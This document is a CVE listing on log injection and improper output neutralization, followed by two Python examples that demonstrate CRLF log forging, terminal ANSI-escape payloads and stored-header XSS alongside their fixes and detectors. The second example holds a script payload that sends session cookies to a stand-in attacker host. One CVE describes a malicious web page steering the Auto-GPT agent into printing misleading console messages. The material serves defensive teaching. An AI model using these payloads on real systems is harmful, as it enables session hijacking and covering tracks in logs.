Total: 67 CVE

CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description
---|---|---|---|---|---|---
CVE-2024-31845 | | | 2024-11-21 | N/A | 5.3 MEDIUM | An issue was discovered in Italtel Embrace 1.6.4. The product does not neutralize, or incorrectly neutralizes, output that is written to logs. The web application writes logs using a GET query string parameter; an attacker can modify this parameter so that every action they perform is attributed to a different user. This can be exploited without authentication.
CVE-2024-29022 | | | 2024-11-21 | N/A | 8.8 HIGH | Xibo is an Open Source Digital Signage platform with a web content management system and Windows display player software. In affected versions some request headers are not correctly sanitised when stored in the session and display tables. These headers can be used to inject a malicious script into the session page to exfiltrate session IDs and User Agents, which can subsequently be used to hijack active sessions. A malicious script can also be injected into the display grid to exfiltrate information related to displays. Users should upgrade to version 3.3.10 or 4.0.9, which fix this issue. Customers who host their CMS with the Xibo Signage service have already received an upgrade or patch regardless of the CMS version they are running. Upgrading to a fixed version is necessary to remediate. Patches are available for earlier versions of Xibo CMS that are out of security support: 2.3 patch ebeccd000b51f00b9a25f56a2f252d6812ebf850.diff; 1.8 patch a81044e6ccdd92cc967e34c125bd8162432e51bc.diff. There are no known workarounds for this issue.
CVE-2024-25047 | | | 2024-11-21 | N/A | 8.6 HIGH | IBM Cognos Analytics 11.2.0 through 11.2.4 and 12.0.0 through 12.0.2 is vulnerable to injection attacks in application logging because it does not sanitize user-provided data. This could lead to further attacks against the system. IBM X-Force ID: 282956.
CVE-2024-23194 | | | 2024-11-21 | N/A | 3.3 LOW | Improper Output Neutralization for Logs (CWE-117) in the Command Centre API Diagnostics endpoint could allow an attacker limited ability to modify Command Centre log files. This issue affects Gallagher Command Centre v9.10 prior to vEL9.10.1268 (MR1).
CVE-2024-22229 | 1 Dell | 3 Unity Operating Environment, Unity Xt Operating Environment, Unityvsa Operating Environment | 2024-11-21 | N/A | 3.1 LOW | Dell Unity, versions prior to 5.4, contains a vulnerability whereby log messages can be spoofed by an authenticated attacker. An attacker could exploit this vulnerability to forge log entries, create false alarms, and inject malicious content into logs, compromising log integrity. A malicious attacker could also prevent the product from logging information while malicious actions are performed, or implicate an arbitrary user in malicious activity.
CVE-2024-1681 | | | 2024-11-21 | N/A | 5.3 MEDIUM | corydolphin/flask-cors is vulnerable to log injection when the log level is set to debug. An attacker can inject fake log entries into the log file by sending a specially crafted GET request containing a CRLF sequence in the request path. This vulnerability allows attackers to corrupt log files, potentially covering the tracks of other attacks, confusing log post-processing tools, and forging log entries. The issue is due to improper output neutralization for logs.
CVE-2024-0987 | 1 Kuerp Project | 1 Kuerp | 2024-11-21 | 5.8 MEDIUM | 6.3 MEDIUM | A vulnerability classified as critical has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected is an unknown function of the file /runtime/log. The manipulation leads to improper output neutralization for logs. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252252. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
CVE-2024-0095 | | | 2024-11-21 | N/A | 9.0 CRITICAL | NVIDIA Triton Inference Server for Linux and Windows contains a vulnerability where a user can inject forged logs and executable commands by injecting arbitrary data as a new log entry. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.
CVE-2023-7234 | 1 Integrationobjects | 1 Opc Ua Server Toolkit | 2024-11-21 | N/A | 5.3 MEDIUM | OPCUAServerToolkit writes a log message once an OPC UA client has successfully connected, containing the client's self-defined description field, a client-controlled value that is written to the log without neutralization.
CVE-2023-6484 | | | 2024-11-21 | N/A | 5.3 MEDIUM | A log injection flaw was found in Keycloak. A text string may be injected through the authentication form when using the WebAuthn authentication mode. This issue may have a minor impact on log integrity.
CVE-2023-6002 | 1 Yugabyte | 1 Yugabytedb | 2024-11-21 | N/A | 6.5 MEDIUM | YugabyteDB is vulnerable to cross-site scripting (XSS) via log injection. Writing unvalidated user input to log files can allow an unprivileged attacker to forge log entries or inject malicious content into the logs.
CVE-2023-4065 | 1 Redhat | 4 Enterprise Linux, Jboss A-mq, Jboss Middleware and 1 more | 2024-11-21 | N/A | 5.5 MEDIUM | A flaw was found in Red Hat AMQ Broker Operator: a password defined in the ActiveMQArtemisAddress CR is shown in plain text in the Operator log. This flaw allows an authenticated local attacker to access information outside of their permissions.
CVE-2023-46713 | 1 Fortinet | 1 Fortiweb | 2024-11-21 | N/A | 5.3 MEDIUM | An improper output neutralization for logs in Fortinet FortiWeb 6.2.0 - 6.2.8, 6.3.0 - 6.3.23, 7.0.0 - 7.0.9, 7.2.0 - 7.2.5 and 7.4.0 may allow an attacker to forge traffic logs via a crafted URL of the web application.
CVE-2023-46322 | 1 Iterm2 | 1 Iterm2 | 2024-11-21 | N/A | 9.8 CRITICAL | iTermSessionLauncher.m in iTerm2 before 3.5.0beta12 does not sanitize ssh hostnames in URLs: the hostname's initial character may be non-alphanumeric, and its other characters may be outside the set of alphanumeric characters, dash, and period.
CVE-2023-46321 | 1 Iterm2 | 1 Iterm2 | 2024-11-21 | N/A | 9.8 CRITICAL | iTermSessionLauncher.m in iTerm2 before 3.5.0beta12 does not sanitize paths in x-man-page URLs, which may contain shell metacharacters for a /usr/bin/man command line.
CVE-2023-39461 | | | 2024-11-21 | N/A | 4.4 MEDIUM | Triangle MicroWorks SCADA Data Gateway Event Log Improper Output Neutralization For Logs Arbitrary File Write Vulnerability. This vulnerability allows remote attackers to write arbitrary files on affected installations of Triangle MicroWorks SCADA Data Gateway. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of event logs and results from improper sanitization of log output. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-20535.
CVE-2023-38020 | 1 Ibm | 1 Soar Qradar Plugin App | 2024-11-21 | N/A | 4.3 MEDIUM | IBM SOAR QRadar Plugin App 1.0 through 5.0.3 could allow an authenticated user to manipulate output written to log files. IBM X-Force ID: 260576.
CVE-2023-37275 | 1 Agpt | 1 Auto-gpt | 2024-11-21 | N/A | 3.1 LOW | Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model. The Auto-GPT command line UI makes heavy use of color-coded print statements to signify different types of system messages to the user, including messages that are crucial for the user to review in order to control which commands are executed. Before v0.4.3, a malicious external resource (such as a website browsed by Auto-GPT) could cause misleading messages to be printed to the console by getting the LLM to regurgitate JSON-encoded ANSI escape sequences (`\u001b[`). These escape sequences were JSON-decoded and printed to the console as part of the model's "thinking process". The issue has been patched in release version 0.4.3.
CVE-2023-36924 | 1 Sap | 1 Erp Defense Forces And Public Security | 2024-11-21 | N/A | 4.9 MEDIUM | While using a specific function, SAP ERP Defense Forces and Public Security, versions 600, 603, 604, 605, 616, 617, 618, 802, 803, 804, 805, 806 and 807, allows an authenticated attacker with admin privileges to write arbitrary data to the syslog file. On successful exploitation, an attacker could modify all the syslog data, causing a complete compromise of the integrity of the application.
CVE-2023-32712 | 1 Splunk | 1 Splunk | 2024-11-21 | N/A | 8.6 HIGH | In Splunk Enterprise versions below 9.1.0.2, 9.0.5.1, and 8.2.11.2, an attacker can inject American National Standards Institute (ANSI) escape codes into Splunk log files that, when a vulnerable terminal application reads them, can at worst result in code execution in that application. This attack requires a user to read the malicious log file locally in a terminal application that translates ANSI escape codes, and to perform additional user interaction. Universal Forwarder versions 9.1.0.1, 9.0.5, 8.2.11, and lower can be vulnerable where they have management services active and accessible over the network. Universal Forwarder versions 9.0.x and 9.1.x bind management services to the local machine and are not vulnerable in this configuration. See SVD-2022-0605 for more information. Universal Forwarder versions 9.1 use Unix Domain Sockets (UDS) for communication, which further reduces the potential attack surface. The vulnerability does not directly affect Splunk Enterprise or Universal Forwarder. The indirect impact on Splunk Enterprise and Universal Forwarder can vary significantly depending on the permissions of the vulnerable terminal application and on where and how the user reads the malicious log file. For example, users can copy the malicious file from the Splunk Enterprise instance and read it on their local machine.
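The two payload classes that recur in this listing are a CRLF sequence in attacker-controlled request data, which forges a second record (the flask-cors entry), and ANSI escape sequences that are harmless on disk but are executed by the terminal of whoever tails the file (the Splunk and Auto-GPT entries). The example below is added here and is not code from any product in the table; the names `neutralize_for_log`, `SafeFormatter`, `render_access_log` and `scan_log_text`, the logger names and the request paths are all invented for the demonstration. It writes one debug-level access log record with and without neutralization, then runs a scanner over the resulting text.

```python
"""CWE-117 end to end: a debug access log that writes an attacker-controlled
request path, a CRLF payload that forges a record, an ANSI payload aimed at a
terminal, a logging.Formatter that neutralizes both, and a scanner for
existing log text. Added example; all names here are invented for the demo."""
from __future__ import annotations

import io
import logging
import re

# Every C0 control character, DEL and the C1 range (which holds the 8-bit
# CSI, 0x9B). CR, LF and ESC are what an attacker needs; none of them
# belongs in a single log record as a raw byte.
_CONTROL = re.compile(r"[\x00-\x1f\x7f-\x9f]")


def neutralize_for_log(value: str) -> str:
    """Turn control characters into visible escapes: CR/LF can no longer
    start a new record, ESC can no longer start a terminal sequence."""
    named = {"\r": "\\r", "\n": "\\n", "\t": "\\t"}
    return _CONTROL.sub(
        lambda m: named.get(m.group(0), "\\x%02x" % ord(m.group(0))), value)


class SafeFormatter(logging.Formatter):
    """Formatter that neutralizes the interpolated message. Escaping after
    %-interpolation covers untrusted data passed as args, which is how
    request data is normally (and correctly) logged."""

    def format(self, record: logging.LogRecord) -> str:
        record.msg = neutralize_for_log(record.getMessage())
        record.args = ()
        return super().format(record)


LOG_FORMAT = "%(levelname)s %(name)s %(message)s"


def render_access_log(path: str, safe: bool) -> str:
    """Log one request the way a debug-level access log would and return
    the raw text written to the stream. safe=False reproduces the bug."""
    logger = logging.getLogger("access.safe" if safe else "access.unsafe")
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.DEBUG)
    buf = io.StringIO()
    handler = logging.StreamHandler(buf)
    handler.setFormatter(SafeFormatter(LOG_FORMAT) if safe else logging.Formatter(LOG_FORMAT))
    logger.addHandler(handler)
    logger.debug("GET %s from 203.0.113.5", path)  # path is attacker-controlled
    handler.flush()
    return buf.getvalue()


# Constructed payloads for the demo (not taken from any advisory):
# 1. CRLF forging: the text after \r\n lands on its own line.
CRLF_PATH = "/api/status\r\nINFO auth admin login ok from 10.0.0.1"
# 2. ANSI escapes: clear the screen (CSI 2J) and set the terminal title
#    (OSC 0 ... BEL), run by the terminal of anyone who tails the file.
ANSI_PATH = "/\x1b[2J\x1b]0;owned\x07"

# Shape every record of this logger has. Catches naive forging only: an
# attacker who knows the format can reproduce it, so this is triage,
# not the fix; the fix is neutralization at the sink.
_RECORD_SHAPE = re.compile(r"^(DEBUG|INFO|WARNING|ERROR|CRITICAL) access\.\S+ ")
_ESCAPE = re.compile(r"[\x00-\x08\x0b-\x1f\x7f-\x9f]")


def scan_log_text(text: str) -> list[tuple[int, str]]:
    """Return (line number, reason) for lines that carry raw escape bytes
    or do not look like a record this logger would have written."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        if _ESCAPE.search(line):
            findings.append((number, "raw control or escape byte"))
        elif not _RECORD_SHAPE.match(line):
            findings.append((number, "line does not match the record shape"))
    return findings


if __name__ == "__main__":
    for path in (CRLF_PATH, ANSI_PATH):
        unsafe = render_access_log(path, safe=False)
        print("--- unsafe ---", unsafe, "findings:", scan_log_text(unsafe))
        print("--- safe ---", render_access_log(path, safe=True))
```

Once a CRLF payload has reached disk, the forged line is ordinary text; the scanner above only catches it because the constructed payload did not bother to copy the logger name. ANSI payloads, by contrast, stay detectable because the ESC byte itself survives in the file, which is also why `cat` or `tail -f` on an untrusted log should go through `less` or `cat -v`.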
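The Xibo and YugabyteDB entries describe a different sink for the same data: request headers stored verbatim and later rendered in a web page, where the payload is markup rather than control characters. Control-character escaping does nothing against that; the viewer has to HTML-encode every stored value for the context it lands in, at output time. The example below is added here and is not Xibo's or YugabyteDB's code; the session rows, the User-Agent payloads, the table layout and the function names are constructed for the demonstration. It renders the same rows with and without encoding and checks the result with the standard-library HTML parser.

```python
"""Stored header rendered in a log/session viewer: vulnerable and hardened
renderers plus a parser-based check for active content. Added example; the
rows and function names are invented for the demo."""
import html
from html.parser import HTMLParser

# Constructed session rows, as a session table might hold them. The
# User-Agent is attacker-supplied and is stored exactly as received.
SESSION_ROWS = [
    {"session_id": "s-0001", "user_agent": "Mozilla/5.0 (X11; Linux x86_64)"},
    # Element-context payload: becomes a <script> element in the cell.
    {"session_id": "s-0002",
     "user_agent": "<script>fetch('https://attacker.invalid/?c='+document.cookie)</script>"},
    # Attribute-context payload: closes the title attribute and adds a handler.
    {"session_id": "s-0003", "user_agent": 'x" onmouseover="alert(1)'},
]


def render_session_table_unsafe(rows):
    """The bug: stored values interpolated straight into markup and into
    an attribute value."""
    cells = "".join(
        f'<tr><td title="{r["user_agent"]}">{r["session_id"]}</td>'
        f'<td>{r["user_agent"]}</td></tr>'
        for r in rows)
    return f"<table>{cells}</table>"


def render_session_table(rows):
    """The fix: html.escape(quote=True) on every value at output time. The
    quote=True matters for the title attribute, where a bare double quote
    would end the attribute."""
    def esc(value):
        return html.escape(str(value), quote=True)
    cells = "".join(
        f'<tr><td title="{esc(r["user_agent"])}">{esc(r["session_id"])}</td>'
        f'<td>{esc(r["user_agent"])}</td></tr>'
        for r in rows)
    return f"<table>{cells}</table>"


class _ActiveContentFinder(HTMLParser):
    """Collect script elements and on* event-handler attributes as the
    browser's tokenizer would see them (string matching on the rendered
    text would also fire on the harmless escaped copies)."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler attribute {name}")


def find_active_content(rendered: str) -> list:
    """Return a list of active-content findings for a rendered fragment;
    an empty list means nothing executable survived rendering."""
    finder = _ActiveContentFinder()
    finder.feed(rendered)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print("unsafe:", find_active_content(render_session_table_unsafe(SESSION_ROWS)))
    print("safe:  ", find_active_content(render_session_table(SESSION_ROWS)))
```

Encoding on output rather than "sanitising when stored" keeps the raw header available for forensics and avoids the lossy one-off cleanup that has to be redone for every new sink; a Content-Security-Policy on the viewer is a useful second layer but not a substitute.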